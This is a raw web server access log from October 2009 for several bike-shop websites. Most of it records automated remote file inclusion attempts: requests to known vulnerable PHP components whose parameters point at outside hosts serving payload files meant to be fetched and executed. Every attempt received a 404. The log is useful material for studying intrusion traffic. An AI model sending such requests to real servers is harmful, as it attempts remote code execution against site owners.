64.150.183.219 - - [11/Oct/2009:02:22:15 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [11/Oct/2009:02:22:17 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [11/Oct/2009:02:22:17 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [11/Oct/2009:02:22:17 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [11/Oct/2009:02:22:19 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [11/Oct/2009:02:22:19 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [11/Oct/2009:02:22:19 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:22:47 -0700] "GET /logs//skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:22:47 -0700] "GET /skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:22:47 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:02:22:56 -0700] "GET /logs//skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:02:22:56 -0700] "GET /skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:02:22:56 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:02:22:56 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:02:22:56 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:02:22:56 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [11/Oct/2009:02:23:20 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [11/Oct/2009:02:23:20 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [11/Oct/2009:02:23:20 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [11/Oct/2009:02:23:21 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [11/Oct/2009:02:23:21 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [11/Oct/2009:02:23:21 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:02:23:35 -0700] "GET /logs//skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:02:23:35 -0700] "GET /skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:02:23:35 -0700] "GET /logs/access.log//skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:23:54 -0700] "GET /skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:23:54 -0700] "GET /logs/access.log//skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:23:54 -0700] "GET /logs//skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:02:24:45 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:02:24:45 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:02:24:45 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:02:24:45 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:02:24:45 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:02:24:45 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:02:24:50 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:02:24:50 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:02:24:50 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:02:24:53 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:02:24:53 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:02:24:53 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:02:25:28 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:02:25:28 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:02:25:28 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:25:29 -0700] "GET /logs//skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:25:29 -0700] "GET /logs/access.log//skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:25:29 -0700] "GET /skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:26:13 -0700] "GET /skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:26:13 -0700] "GET /logs//skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:26:13 -0700] "GET /logs/access.log//skin/ggambo7002_board/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.238.165.123 - - [11/Oct/2009:02:26:24 -0700] "GET /write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.238.165.123 - - [11/Oct/2009:02:26:25 -0700] "GET /logs/access.log//write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.238.165.123 - - [11/Oct/2009:02:26:25 -0700] "GET /logs//write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.238.165.123 - - [11/Oct/2009:02:26:46 -0700] "GET /write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.238.165.123 - - [11/Oct/2009:02:26:46 -0700] "GET /logs/access.log//write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.238.165.123 - - [11/Oct/2009:02:26:46 -0700] "GET /logs//write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.238.165.123 - - [11/Oct/2009:02:29:58 -0700] "GET /ask_password.php?dir=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.238.165.123 - - [11/Oct/2009:02:29:58 -0700] "GET /logs/access.log//ask_password.php?dir=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.238.165.123 - - [11/Oct/2009:02:29:58 -0700] "GET /logs//ask_password.php?dir=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.51.114 - - [11/Oct/2009:02:34:36 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
222.236.47.182 - - [11/Oct/2009:02:44:32 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [11/Oct/2009:02:45:11 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.233.52.18 - - [11/Oct/2009:02:45:54 -0700] "GET /logs/access.log%20//ask_password.php?dir=http://ea3.fileave.com/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.233.52.18 - - [11/Oct/2009:02:45:54 -0700] "GET /logs//ask_password.php?dir=http://ea3.fileave.com/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.233.52.18 - - [11/Oct/2009:02:45:55 -0700] "GET /ask_password.php?dir=http://ea3.fileave.com/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
206.225.23.4 - - [11/Oct/2009:02:47:01 -0700] "GET /logs///appserv/main.php?appserv_root=http://lighttown.net//copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.225.23.4 - - [11/Oct/2009:02:47:01 -0700] "GET /logs/access.log%20%20///appserv/main.php?appserv_root=http://lighttown.net//copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.233.52.18 - - [11/Oct/2009:02:47:40 -0700] "GET /logs/access.log//ask_password.php?dir=http://ea3.fileave.com/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.233.52.18 - - [11/Oct/2009:02:47:40 -0700] "GET /logs//ask_password.php?dir=http://ea3.fileave.com/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.233.52.18 - - [11/Oct/2009:02:47:40 -0700] "GET /ask_password.php?dir=http://ea3.fileave.com/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.6.22.175 - - [11/Oct/2009:02:47:52 -0700] "GET /bullitinboard/viewtopic.php?p=15826 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
222.233.52.18 - - [11/Oct/2009:02:48:17 -0700] "GET /logs/access.log//ask_password.php?dir=http://ea3.fileave.com/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:49:41 -0700] "GET /skin/zero_vote/error.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:49:41 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:49:41 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:50:51 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:50:51 -0700] "GET /skin/zero_vote/error.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.192.248.35 - - [11/Oct/2009:02:50:51 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.225.23.4 - - [11/Oct/2009:02:50:56 -0700] "GET /logs/access.log///appserv/main.php?appserv_root=http://lighttown.net//copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.230.123.88 - - [11/Oct/2009:02:51:32 -0700] "GET //appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.230.123.88 - - [11/Oct/2009:02:51:32 -0700] "GET /logs///appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.230.123.88 - - [11/Oct/2009:02:51:32 -0700] "GET /logs/access.log%20%20///appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.233.52.18 - - [11/Oct/2009:02:51:50 -0700] "GET /logs/access.log%20//ask_password.php?dir=http://ea3.fileave.com/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
199.238.165.123 - - [11/Oct/2009:02:58:26 -0700] "GET /write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.238.165.123 - - [11/Oct/2009:02:58:26 -0700] "GET /logs//write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.238.165.123 - - [11/Oct/2009:02:58:26 -0700] "GET /logs/access.log%20%20//write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.238.165.123 - - [11/Oct/2009:02:58:40 -0700] "GET /write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.238.165.123 - - [11/Oct/2009:02:58:40 -0700] "GET /logs//write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.238.165.123 - - [11/Oct/2009:02:58:44 -0700] "GET /logs/access.log%20%20//write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.115.1.7 - - [11/Oct/2009:03:03:07 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
72.9.225.71 - - [11/Oct/2009:03:08:17 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.9.225.71 - - [11/Oct/2009:03:08:17 -0700] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.9.225.71 - - [11/Oct/2009:03:08:17 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.9.225.71 - - [11/Oct/2009:03:08:24 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.9.225.71 - - [11/Oct/2009:03:08:24 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.9.225.71 - - [11/Oct/2009:03:08:24 -0700] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.238.2.226 - - [11/Oct/2009:03:09:33 -0700] "GET /logs/access.log///appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
82.193.15.3 - - [11/Oct/2009:03:26:53 -0700] "GET /logs//write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
82.193.15.3 - - [11/Oct/2009:03:26:56 -0700] "GET /write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.5.136 - - [11/Oct/2009:03:28:03 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.5.136 - - [11/Oct/2009:03:28:03 -0700] "GET /main.php?sayfa=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.5.136 - - [11/Oct/2009:03:28:03 -0700] "GET /logs//main.php?sayfa=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
38.101.148.126 - - [11/Oct/2009:03:33:37 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "bicyclestoreshouston.com"
38.101.148.126 - - [11/Oct/2009:03:33:39 -0700] "GET /bullitinboard/viewtopic.php?p=15325 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "bicyclestoreshouston.com"
125.251.147.194 - - [11/Oct/2009:03:37:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:03:37:05 -0700] "GET /skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:03:37:05 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:03:37:05 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:03:37:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:03:37:05 -0700] "GET /skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.233.52.18 - - [11/Oct/2009:03:38:04 -0700] "GET /logs/access.log//ask_password.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.233.52.18 - - [11/Oct/2009:03:38:04 -0700] "GET /logs//ask_password.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.5.136 - - [11/Oct/2009:03:38:08 -0700] "GET /logs/access.log//main.php?sayfa=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.233.52.18 - - [11/Oct/2009:03:38:09 -0700] "GET /ask_password.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.61.164.139 - - [11/Oct/2009:03:38:11 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
